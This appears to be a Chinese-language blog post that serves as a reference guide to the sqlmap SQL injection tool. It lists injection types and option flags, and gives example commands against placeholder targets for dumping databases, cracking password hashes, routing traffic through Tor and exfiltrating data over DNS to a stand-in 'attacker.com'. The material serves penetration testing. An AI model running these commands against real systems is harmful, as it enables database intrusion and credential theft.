<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon32x32.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16x16.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="安全工具," />





  <link rel="alternate" href="/atom.xml" title="Secer" type="application/atom+xml" />






<meta name="keywords" content="安全工具">
<meta property="og:type" content="article">
<meta property="og:title" content="SQLMAP一把梭">
<meta property="og:url" content="http://yoursite.com/2018/08/10/SQLMAP一把梭/index.html">
<meta property="og:site_name" content="Secer">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/images/pasted-18.png">
<meta property="og:updated_time" content="2018-08-13T09:18:14.865Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQLMAP一把梭">
<meta name="twitter:image" content="http://yoursite.com/images/pasted-18.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/08/10/SQLMAP一把梭/"/>





  <title>SQLMAP一把梭 | Secer</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Secer</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/08/10/SQLMAP一把梭/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="shiqian">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Secer">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQLMAP一把梭</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-08-10T11:30:05+08:00">
                2018-08-10
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/安全工具/" itemprop="url" rel="index">
                    <span itemprop="name">安全工具</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<a id="more"></a>
<p><img src="\images\pasted-18.png" alt="upload successful"></p>
<h1 id="SQL注入的类型"><a href="#SQL注入的类型" class="headerlink" title="SQL注入的类型"></a>SQL注入的类型</h1><p>1.基于布尔的盲注，即可以根据返回页面判断条件真假的注入</p>
<p>2.基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（也就是根据页面返回时间是否增加）来判断</p>
<p>3.基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中</p>
<p>4.联合查询注入，可以使用union的情况下的注入</p>
<p>5.堆查询注入，可以同时执行多条语句的执行时的注入</p>
<h1 id="SQLMAP对URL的操作"><a href="#SQLMAP对URL的操作" class="headerlink" title="SQLMAP对URL的操作"></a>SQLMAP对URL的操作</h1><p>1.判断可注入的参数</p>
<p>2.判断可以用哪种SQL注入技术来注入</p>
<p>3.识别出哪种数据库</p>
<p>4.根据用户选择，读取哪些数据</p>
<h1 id="SQLMAP支持的数据库"><a href="#SQLMAP支持的数据库" class="headerlink" title="SQLMAP支持的数据库"></a>SQLMAP支持的数据库</h1><p>MySQL，Oracle，PostgreSQL</p>
<p>Microsoft SQL Server，Microsoft Access，IBM DB2</p>
<p>SQLite，Firebird，Sybase，SAP MaxDB</p>
<h1 id="必备骚操作参数"><a href="#必备骚操作参数" class="headerlink" title="必备骚操作参数"></a>必备骚操作参数</h1><h2 id="一、观察注入数据"><a href="#一、观察注入数据" class="headerlink" title="一、观察注入数据"></a>一、观察注入数据</h2><p>sqlmap –v [args]此参数共有七个等级，默认等级为一级</p>
<p>0 只显示python错误以及严重信息</p>
<p>1 同时显示基本信息和警告信息（默认）</p>
<p>2 同时显示debug信息</p>
<p>3 同时显示注入的payload</p>
<p>4 同时显示HTTP请求</p>
<p>5 同时显示HTTP响应头</p>
<p>6 同时显示HTTP相应页面</p>
<h5 id="【如果想看到测试的payload就用等级3】"><a href="#【如果想看到测试的payload就用等级3】" class="headerlink" title="【如果想看到测试的payload就用等级3】"></a>【如果想看到测试的payload就用等级3】</h5><h2 id="二、获取目标方式"><a href="#二、获取目标方式" class="headerlink" title="二、获取目标方式"></a>二、获取目标方式</h2><h5 id="1-直接连接到数据库"><a href="#1-直接连接到数据库" class="headerlink" title="1.直接连接到数据库"></a>1.直接连接到数据库</h5><p>  参数：-d</p>
<p>  对单个数据库实例运行sqlmap</p>
<p>python sqlmap.py -d “mysql://admin:<a href="mailto:admin@192.168.1.2" target="_blank" rel="noopener">admin@192.168.1.2</a>:3306/testdb” -f –banner –dbs –users </p>
<h5 id="2-目标URL"><a href="#2-目标URL" class="headerlink" title="2.目标URL"></a>2.目标URL</h5><p>  参数：-u或者—url</p>
<p>  URL格式要求：http(s)://targeturl[:port]/[…]</p>
<p>  python sqlmap.py -u “<a href="http://www.target.com/vuln.php?id=1&quot;" target="_blank" rel="noopener">http://www.target.com/vuln.php?id=1&quot;</a> -f –banner –dbs –users </p>
<h5 id="3-从Burp或WebScarab代理中获取日志"><a href="#3-从Burp或WebScarab代理中获取日志" class="headerlink" title="3.从Burp或WebScarab代理中获取日志"></a>3.从Burp或WebScarab代理中获取日志</h5><p>  参数：-l</p>
<p>  把Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap检测</p>
<h5 id="4-从文本中获取多个目标扫描"><a href="#4-从文本中获取多个目标扫描" class="headerlink" title="4.从文本中获取多个目标扫描"></a>4.从文本中获取多个目标扫描</h5><p>  参数：-m</p>
<p>  URL保存在文本中，sqlmap会一个一个检测</p>
<h5 id="5-从文件中加载HTTP请求"><a href="#5-从文件中加载HTTP请求" class="headerlink" title="5.从文件中加载HTTP请求"></a>5.从文件中加载HTTP请求</h5><p>  参数：-r</p>
<p>  【可以跳过设置一些其他参数比如cookie，POST数据】</p>
<p>  当请求是HTTPS的时候要配合—force-ssl参数来使用，或者你可以在Host头后面加上:443</p>
<h5 id="6-处理Google的搜索结果"><a href="#6-处理Google的搜索结果" class="headerlink" title="6.处理Google的搜索结果"></a>6.处理Google的搜索结果</h5><p>  参数：-g</p>
<p>  sqlmap可以测试注入Google的搜索结果中的GET参数</p>
<p>  python sqlmap.py -g “inurl:\”.php?id=1\””</p>
<h5 id="7-从一个配置加载选项INI文件"><a href="#7-从一个配置加载选项INI文件" class="headerlink" title="7.从一个配置加载选项INI文件"></a>7.从一个配置加载选项INI文件</h5><p>  参数：-c</p>
<p>  加载sqlmap.conf文件里面的相关配置</p>
<h2 id="三、请求方式"><a href="#三、请求方式" class="headerlink" title="三、请求方式"></a>三、请求方式</h2><h5 id="1-http数据"><a href="#1-http数据" class="headerlink" title="1.http数据"></a>1.http数据</h5><p>  参数：–data</p>
<p>  此参数是把数据以POST方式提交，sqlmap会像检测GET参数一样检测POST的参数</p>
<p>  python sqlmap.py -u “<a href="http://www.target.com/vuln.php&quot;" target="_blank" rel="noopener">http://www.target.com/vuln.php&quot;</a> –data=”id=1” -f –banner –dbs –users</p>
<h5 id="2-参数拆分字符"><a href="#2-参数拆分字符" class="headerlink" title="2.参数拆分字符"></a>2.参数拆分字符</h5><p>  参数：–param-del</p>
<p>  当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数</p>
<p>  python sqlmap.py -u “<a href="http://www.target.com/vuln.php&quot;" target="_blank" rel="noopener">http://www.target.com/vuln.php&quot;</a> –data=”query=foobar;id=1” –param-del=”;” -f –banner –dbs –users</p>
<h5 id="3-HTTP-cookie头"><a href="#3-HTTP-cookie头" class="headerlink" title="3.HTTP cookie头"></a>3.HTTP cookie头</h5><p>  参数：–cookie/–load-cookies/–drop-set-cookie</p>
<p>  a.web应用需要登陆的时候</p>
<p>  b.你想要在这些头参数中测试SQL注入时</p>
<p>  如果你不想接受set-cookie可以使用—drop-set-cookie参数来拒接</p>
<h5 id="4-HTTP-User-Agent头"><a href="#4-HTTP-User-Agent头" class="headerlink" title="4.HTTP User-Agent头"></a>4.HTTP User-Agent头</h5><p>  参数：–user-agent/–random-agent</p>
<p>【可以使用–user-agent参数来修改，同时也可以使用–random-agent参数来随机的从./txt/user- agents.txt中获取】</p>
<p>  当–level参数设定为3或者3以上的时候，会尝试对User-agent进行注入</p>
<h5 id="5-HTTP-Host头"><a href="#5-HTTP-Host头" class="headerlink" title="5.HTTP Host头"></a>5.HTTP Host头</h5><p>  参数：–host</p>
<p>  可以手动设置HTTPHost头的值</p>
<h5 id="6-HTTP-Referer头"><a href="#6-HTTP-Referer头" class="headerlink" title="6.HTTP Referer头"></a>6.HTTP Referer头</h5><p>  参数：–referer</p>
<p>  可以在请求中伪造HTTP中的referer，当—level参数设定为3或者3以上时候会尝试对referer注入</p>
<h5 id="7-额外的HTTP头"><a href="#7-额外的HTTP头" class="headerlink" title="7.额外的HTTP头"></a>7.额外的HTTP头</h5><p>  参数：–headers</p>
<p>  可以通过以上参数来增加额外的http头</p>
<h5 id="8-HTTP认证保护"><a href="#8-HTTP认证保护" class="headerlink" title="8.HTTP认证保护"></a>8.HTTP认证保护</h5><p>  参数：–auth-type,–auth-cred</p>
<p>  登陆HTTP的认证保护支持三种方式：</p>
<p>  1.Basic</p>
<p>  2.Digest</p>
<p>  3.NTLM</p>
<p>  python sqlmap.py -u “<a href="http://www.target.com/vuln.php?id=1&quot;" target="_blank" rel="noopener">http://www.target.com/vuln.php?id=1&quot;</a> –auth-type Basic –auth-cred “testuser:testpwd”</p>
<h5 id="9-HTTP协议的证书认证"><a href="#9-HTTP协议的证书认证" class="headerlink" title="9.HTTP协议的证书认证"></a>9.HTTP协议的证书认证</h5><p>  参数：–auth-type或–auth-cert</p>
<p>  当web服务器需要客户端证书进行身份认证时，需要提供两个文件：key_file，cert_file</p>
<p>  key_file是格式为PEM文件，包含着私钥，cert_file是格式为PEM的连接文件</p>
<h5 id="10-HTTP协议私有密钥身份认证"><a href="#10-HTTP协议私有密钥身份认证" class="headerlink" title="10.HTTP协议私有密钥身份认证"></a>10.HTTP协议私有密钥身份认证</h5><p>  参数：–auth-private</p>
<p>  当web服务器需要客户端私钥证书进行身份认证时，需要提供PEM格式包含私钥的key_file </p>
<h5 id="11-HTTP-S-代理"><a href="#11-HTTP-S-代理" class="headerlink" title="11.HTTP(S)代理"></a>11.HTTP(S)代理</h5><p>  参数：–proxy，–proxy-cred，–ignore-proxy</p>
<p>  使用–proxy代理格式：<a href="http://url:port" target="_blank" rel="noopener">http://url:port</a></p>
<p>  当http(s)需要认证是可以使用—proxy-cred参数：username：password</p>
<p>  –ignore-proxy是拒绝使用本地局域网的http(s)代理</p>
<h5 id="12-Tor网络匿名"><a href="#12-Tor网络匿名" class="headerlink" title="12.Tor网络匿名"></a>12.Tor网络匿名</h5><p>  参数：–tor，–tor-port，–tor-type和–check-tor</p>
<p>  配置好tor后，sqlmap使用–tor参数会自动尝试连接tor，使用tor网络进行数据提交。</p>
<h5 id="13-HTTP请求延迟"><a href="#13-HTTP请求延迟" class="headerlink" title="13.HTTP请求延迟"></a>13.HTTP请求延迟</h5><p>  参数：–delay</p>
<p>  可以设定两个HTTP(S)请求间的延迟，设定为0.5的时候是半秒，默认是没有延迟的。</p>
<h5 id="14-设定超时时间"><a href="#14-设定超时时间" class="headerlink" title="14.设定超时时间"></a>14.设定超时时间</h5><p>  参数：–timeout</p>
<p>  可以设定一个HTTP(S)请求超过多久判定为超时，10就代表10s，默认是30s</p>
<h5 id="15-设定重试超时"><a href="#15-设定重试超时" class="headerlink" title="15.设定重试超时"></a>15.设定重试超时</h5><p>  参数：–retries</p>
<p>  当HTTP(S)超时时，可以设定重试连接次数，默认3次</p>
<h5 id="16-设置随机改变的参数值"><a href="#16-设置随机改变的参数值" class="headerlink" title="16.设置随机改变的参数值"></a>16.设置随机改变的参数值</h5><p>  参数：–randomize</p>
<p>  可以设定某一个参数值在每一次请求中随机的变化，长度和类型会与提供的初始值一样</p>
<h5 id="17-利用正则过滤目标网址"><a href="#17-利用正则过滤目标网址" class="headerlink" title="17.利用正则过滤目标网址"></a>17.利用正则过滤目标网址</h5><p>  参数：–scope</p>
<p>  python sqlmap.py -l burp.log –scope=”(www)?.target.(com|net|org)”</p>
<h5 id="18-避免过多的错误请求被屏蔽"><a href="#18-避免过多的错误请求被屏蔽" class="headerlink" title="18.避免过多的错误请求被屏蔽"></a>18.避免过多的错误请求被屏蔽</h5><p>  参数：–safe-url，–safe-freq</p>
<p>  有的web应用程序会在你多次访问错误的请求后，触发防护策略，导致以后无法进行</p>
<p>  1.—safe-url：提供一个安全不错误的连接，每隔一段时间都会去访问一下</p>
<p>  2.—safe-freq：提供一个安全不错误的连接，每次测试请求后都会再访问一次正常连接。</p>
<h5 id="19-使用SSL-HTTPS"><a href="#19-使用SSL-HTTPS" class="headerlink" title="19.使用SSL/HTTPS"></a>19.使用SSL/HTTPS</h5><p>  参数：–force-ssl</p>
<p>  如果用户想要强迫使用HTTPS或SSL则使用该参数</p>
<h5 id="20-关掉URL参数值编码"><a href="#20-关掉URL参数值编码" class="headerlink" title="20.关掉URL参数值编码"></a>20.关掉URL参数值编码</h5><p>  参数：–skip-urlencode</p>
<p>  根据参数位置，他的值默认会被URL编码，但是有时候目标web服务器不遵守RFC标准，只接受不经过URL编码的值，这个时候使用该参数。</p>
<h5 id="21-每次请求时候执行自定义的python代码"><a href="#21-每次请求时候执行自定义的python代码" class="headerlink" title="21.每次请求时候执行自定义的python代码"></a>21.每次请求时候执行自定义的python代码</h5><p>  参数：–eval</p>
<p>  在有些时候，需要根据某个参数值的变化，而修改另一个参数，才能形成正常的请求，这时可以用—eval参数在每次请求时根据所写python代码做完修改后的请求。<br>   python sqlmap.py -u “<a href="http://www.target.com/vuln.php?id=1&amp;hash=lsddjflka23&quot;" target="_blank" rel="noopener">http://www.target.com/vuln.php?id=1&amp;hash=lsddjflka23&quot;</a> –eval=”import hashlib;hash=hashlib.md5(id).hexdigest()”</p>
<h2 id="四、优化"><a href="#四、优化" class="headerlink" title="四、优化"></a>四、优化</h2><h5 id="1-收集优化"><a href="#1-收集优化" class="headerlink" title="1.收集优化"></a>1.收集优化</h5><p>  参数：-o</p>
<p>  这个参数是一个别名，隐式的设置以下选项：</p>
<p>  –keep-alive</p>
<p>  –null-connection</p>
<p>  –threads=3</p>
<h5 id="2-输出预测"><a href="#2-输出预测" class="headerlink" title="2.输出预测"></a>2.输出预测</h5><p>  参数：–predict-output</p>
<p>  这是用于推理算法顺序检索的值的字符统计预测</p>
<h5 id="3-HTTP活动"><a href="#3-HTTP活动" class="headerlink" title="3.HTTP活动"></a>3.HTTP活动</h5><p>  参数：–keep-alive</p>
<p>  使用持久连接</p>
<h5 id="4-HTTP空连接"><a href="#4-HTTP空连接" class="headerlink" title="4.HTTP空连接"></a>4.HTTP空连接</h5><p>  参数：–null-connection</p>
<p>  可以用于盲注区分trus和false响应</p>
<h5 id="5-并发HTTP-S-请求"><a href="#5-并发HTTP-S-请求" class="headerlink" title="5.并发HTTP(S)请求"></a>5.并发HTTP(S)请求</h5><p>  参数：–threads</p>
<p>  可以指定并发HTTP(S)请求的最大数量，并发请求的最大数量设置10</p>
<h2 id="五、探测"><a href="#五、探测" class="headerlink" title="五、探测"></a>五、探测</h2><h5 id="1-测试参数"><a href="#1-测试参数" class="headerlink" title="1.测试参数"></a>1.测试参数</h5><p>  参数：-p，–skip</p>
<p>  当你使用—level的值很大但是有个别参数不想测试的时候可以使用—skip参数</p>
<p>  –skip=”user-agent.referer”</p>
<h5 id="2-URI注入点"><a href="#2-URI注入点" class="headerlink" title="2.URI注入点"></a>2.URI注入点</h5><p>  参数：-u</p>
<p>  python sqlmap.py -u “<a href="http://www.target.com/vuln/param1/vuln1*/param2&quot;" target="_blank" rel="noopener">http://www.target.com/vuln/param1/vuln1*/param2&quot;</a></p>
<h5 id="3-指定数据库"><a href="#3-指定数据库" class="headerlink" title="3.指定数据库"></a>3.指定数据库</h5><p>  参数：–dbms</p>
<p>  sqlmap会自动探测web的应用后端数据库是什么</p>
<h5 id="4-风险等级"><a href="#4-风险等级" class="headerlink" title="4.风险等级"></a>4.风险等级</h5><p>  参数：–risk</p>
<p>  共有四个风险等级，默认是1，会探测大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。</p>
<h5 id="5-页面比较"><a href="#5-页面比较" class="headerlink" title="5.页面比较"></a>5.页面比较</h5><p>  参数：–string，–not-string，–regexp，–code</p>
<p>  参数：–text-only，–titles</p>
<p>  在默认情况下区别true和false的布尔型注入，在这些参数中是比较原网页和探测注入后的不一样。</p>
<h2 id="六、注入技术"><a href="#六、注入技术" class="headerlink" title="六、注入技术"></a>六、注入技术</h2><h5 id="1-测试是否是注入"><a href="#1-测试是否是注入" class="headerlink" title="1.测试是否是注入"></a>1.测试是否是注入</h5><p>  参数：–technique</p>
<p>  B:Boolean- based blind SQL injection(布尔型注入)  E:Error-based SQL injection(报错型注入)</p>
<p>  U:UNION query SQL injection(联合查询注入)</p>
<p>  S:Stacked queries SQL injection(多语句查询注入)</p>
<p>  T:Time-based blind SQL injection(基于时间延迟注入)</p>
<h5 id="2-设定延时注入的时间"><a href="#2-设定延时注入的时间" class="headerlink" title="2.设定延时注入的时间"></a>2.设定延时注入的时间</h5><p>  参数：–time-sec</p>
<p>  当使用基于时间的盲注时，使用这个参数设定延时时间，默认是五秒</p>
<h5 id="3-设定UNION查询字段数"><a href="#3-设定UNION查询字段数" class="headerlink" title="3.设定UNION查询字段数"></a>3.设定UNION查询字段数</h5><p>  参数：–union-cols</p>
<p>  默认情况下sqlmap测试UNION查询注入会测试1-10个字段数，当–level为5的时候他会增加测试到50个字段数。设定–union-cols的值应该是一段整数，如：12-16，是测试12-16个字段数。</p>
<h5 id="4-设定UNION查询使用的字符"><a href="#4-设定UNION查询使用的字符" class="headerlink" title="4.设定UNION查询使用的字符"></a>4.设定UNION查询使用的字符</h5><p>   参数：–union-char</p>
<p>  默认情况下sqlmap针对UNION查询的注入会使用NULL字符，但是有些情况下会造成页面返回失败，而一个随机整数是成功的，这是你可以用–union-char只定UNION查询的字符。</p>
<h5 id="5-DNS泄露攻击"><a href="#5-DNS泄露攻击" class="headerlink" title="5.DNS泄露攻击"></a>5.DNS泄露攻击</h5><p>   参数：–dns-domain</p>
<p>  假设攻击者控制着某域名（例如：attacker.com）的域名解析服务器，即查询该域名的子域名对应的IP地址都会到这台域名解析服务器来查询。 </p>
<p>  这时攻击者就可以使用“–dns-domain attacker.com”来进行DNS泄露攻击。</p>
<h5 id="6-二阶SQL注入"><a href="#6-二阶SQL注入" class="headerlink" title="6.二阶SQL注入"></a>6.二阶SQL注入</h5><p>   参数：–second-order</p>
<p>  有些时候注入点输入的数据看返回结果的时候并不是当前的页面，而是另外的一个页面，这时候就需要你指定到哪个页面获取响应判断真假。–second-order后门跟一个判断页面的URL地址。</p>
<h2 id="七、指纹"><a href="#七、指纹" class="headerlink" title="七、指纹"></a>七、指纹</h2><h5 id="数据库管理系统指纹"><a href="#数据库管理系统指纹" class="headerlink" title="数据库管理系统指纹"></a>数据库管理系统指纹</h5><p>参数：-f或–fingerprint    </p>
<p>这个参数是对后端的数据库进行识别    其实默认地sqlmap会自动对注入目标进行数据库管理系统指纹识别。 </p>
<h2 id="八、列数据"><a href="#八、列数据" class="headerlink" title="八、列数据"></a>八、列数据</h2><h5 id="1-标志"><a href="#1-标志" class="headerlink" title="1.标志"></a>1.标志</h5><p>参数：-b,–banner    </p>
<p>大多数的数据库系统都有一个函数可以返回数据库的版本号，通常这个函数是version()或者变量@@version这主要取决与是什么数据库。 </p>
<h5 id="2-用户"><a href="#2-用户" class="headerlink" title="2.用户"></a>2.用户</h5><p>参数：–current-user    sqlmap在大多数据库中可以获取到管理数据的用户 </p>
<h5 id="3-当前数据库"><a href="#3-当前数据库" class="headerlink" title="3.当前数据库"></a>3.当前数据库</h5><p>参数：–current-db    返还当前连接的数据库 </p>
<h5 id="4-当前用户是否为管理员"><a href="#4-当前用户是否为管理员" class="headerlink" title="4.当前用户是否为管理员"></a>4.当前用户是否为管理员</h5><p>参数：–is-dba    判断当前的用户是否为管理，是的话会返回True </p>
<h5 id="5-列数据库管理用户"><a href="#5-列数据库管理用户" class="headerlink" title="5.列数据库管理用户"></a>5.列数据库管理用户</h5><p> 参数：–users    当前用户有权限读取包含所有用户的表的权限时，就可以列出所有管理用户 </p>
<h5 id="6-列出并破解数据库用户的hash"><a href="#6-列出并破解数据库用户的hash" class="headerlink" title="6.列出并破解数据库用户的hash"></a>6.列出并破解数据库用户的hash</h5><p>参数：–passwords</p>
<p> 当前用户有权限读取包含用户密码的库的权限时，sqlmap会现列举出用户，然后列出hash，并尝试破解。</p>
<p>   python sqlmap.py -u “<a href="http://www.target.com/vuln.php?id=1&quot;" target="_blank" rel="noopener">http://www.target.com/vuln.php?id=1&quot;</a> –passwords -v 1</p>
<p>  也可以提供-U参数来指定爆破哪个用户的hash </p>
<h5 id="7-列出数据库管理员权限"><a href="#7-列出数据库管理员权限" class="headerlink" title="7.列出数据库管理员权限"></a>7.列出数据库管理员权限</h5><p>参数：–privileges    当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的权限，sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看哪个用户的权限 </p>
<h5 id="8-列出数据库管理员角色"><a href="#8-列出数据库管理员角色" class="headerlink" title="8.列出数据库管理员角色"></a>8.列出数据库管理员角色</h5><p>   参数：–roles<br>   当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的角色，也可以用-U参数指定你想看哪个用户的角色</p>
<p>  仅适用于当前数据库是Oracle的时候</p>
<h5 id="9-列出数据库系统的数据库"><a href="#9-列出数据库系统的数据库" class="headerlink" title="9.列出数据库系统的数据库"></a>9.列出数据库系统的数据库</h5><p>参数：–dbs    当前用户有权限读取包含所有数据库列表信息的表中的时候，即可列出所有的数据库</p>
<h5 id="10-列举数据库表"><a href="#10-列举数据库表" class="headerlink" title="10.列举数据库表"></a>10.列举数据库表</h5><p>   参数：–tables,–exclude-sysdbs,-D<br>   当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出一个特定数据的所有表。如果你不提供-D参数来列指定的一个数据的时候，sqlmap会列出数据库所有库的所有表。</p>
<p>  –exclude-sysdbs参数是指排除包含了所有数据库名的系统数据库。</p>
<p>  需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是数据库名称。 </p>
<h5 id="11-列举数据库表中的字段"><a href="#11-列举数据库表中的字段" class="headerlink" title="11.列举数据库表中的字段"></a>11.列举数据库表中的字段</h5><p>参数：–columns,-C,-T,-D<br>当前用户有权限读取包含所有数据库表信息的表中数据的时候，即可列出指定数据库表中的字段，同时也会列出字段的数据类型。</p>
<p>如果没有使用-D参数指定数据库时，默认会使用当前数据库。</p>
<h5 id="12-获取表中数据个数"><a href="#12-获取表中数据个数" class="headerlink" title="12.获取表中数据个数"></a>12.获取表中数据个数</h5><p>参数：–count    有时候用户只想获取表中的数据个数而不是具体的内容，那么就可以使用这个参数 </p>
<h5 id="13-获取整个表的数据"><a href="#13-获取整个表的数据" class="headerlink" title="13.获取整个表的数据"></a>13.获取整个表的数据</h5><p> 参数：–dump,-C,-T,-D,–start,–stop,–first,–last<br> 如果当前管理员有权限读取数据库其中的一个表的话，那么就能获取整个表的所有内容。</p>
<p> 使用-D,-T参数指定想要获取哪个库的哪个表，不使用-D参数时，默认使用当前库。<br> 可以获取指定库中的所有表的内容，使用–dump跟-D参数（不使用-T与-C参数）。</p>
<p>sqlmap为每个表生成了一个CSV文件。</p>
<p>  如果你只想获取一段数据，可以使用–start和–stop参数，例如，你只想获取第一段数据可使用–stop 1，如果想获取第二段与第三段数据，使用参数–start 1 –stop 3。</p>
<p>也可以用–first与–last参数，获取第几个字符到第几个字符的内容，如果你想获取字段中地三个字符到第五个字符的内容，使用–first 3 –last 5，这些参数只在盲注的时候使用，因为其他方式可以准确的获取注入内容，不需要一个字符一个字符的猜解。</p>
<h5 id="14-获取所有数据库表的内容"><a href="#14-获取所有数据库表的内容" class="headerlink" title="14.获取所有数据库表的内容"></a>14.获取所有数据库表的内容</h5><p>参数：–dump-all,–exclude-sysdbs    使用–dump-all参数获取所有数据库表的内容，可同时加上–exclude-sysdbs只获取用户数据库的表，需要注意在Microsoft SQL Server中，master数据库没有被考虑成为一个系统数据库，因为有的管理员会把当用户数据库一样来使用它。</p>
<h5 id="15-搜索字段，表，数据库"><a href="#15-搜索字段，表，数据库" class="headerlink" title="15.搜索字段，表，数据库"></a>15.搜索字段，表，数据库</h5><p>   参数：–search,-C,-T,-D<br>   –search可以用来寻找特定的数据库名，所有数据库中的特定表名，所有数据库表中的特定字段。<br>   可以在一下三种情况下使用：</p>
<p>  -C后跟着用逗号分割的列名，将会在所有数据库表中搜索指定的列名。</p>
<p>  -T后跟着用逗号分割的表名，将会在所有数据库中搜索指定的表名</p>
<p>  -D后跟着用逗号分割的库名，将会在所有数据库中搜索指定的库名。</p>
<h5 id="16-运行自定义的SQL语句"><a href="#16-运行自定义的SQL语句" class="headerlink" title="16.运行自定义的SQL语句"></a>16.运行自定义的SQL语句</h5><p>参数：–sql-query,–sql-shell<br>sqlmap默认会自动检测确定使用哪种SQL注入技术，如何插入检索语句。</p>
<p>如果是SELECT查询语句，sqlap将会输出结果。如果是通过SQL注入执行其他语句，需要测试是否支持多语句执行SQL语句。</p>
<h2 id="九、爆破"><a href="#九、爆破" class="headerlink" title="九、爆破"></a>九、爆破</h2><h5 id="1-暴力破解表名"><a href="#1-暴力破解表名" class="headerlink" title="1.暴力破解表名"></a>1.暴力破解表名</h5><p>参数：–common-tables<br>当使用–tables无法获取到数据库的表时，可以使用此参数。通常是如下情况：</p>
<p>1、MySQL数据库版本小于5.0，没有information_schema表。2、数据库是MicrossoftAccess，系统表MSysObjects是不可读的（默认）。</p>
<p>3、当前用户没有权限读取系统中保存数据结构的表的权限。</p>
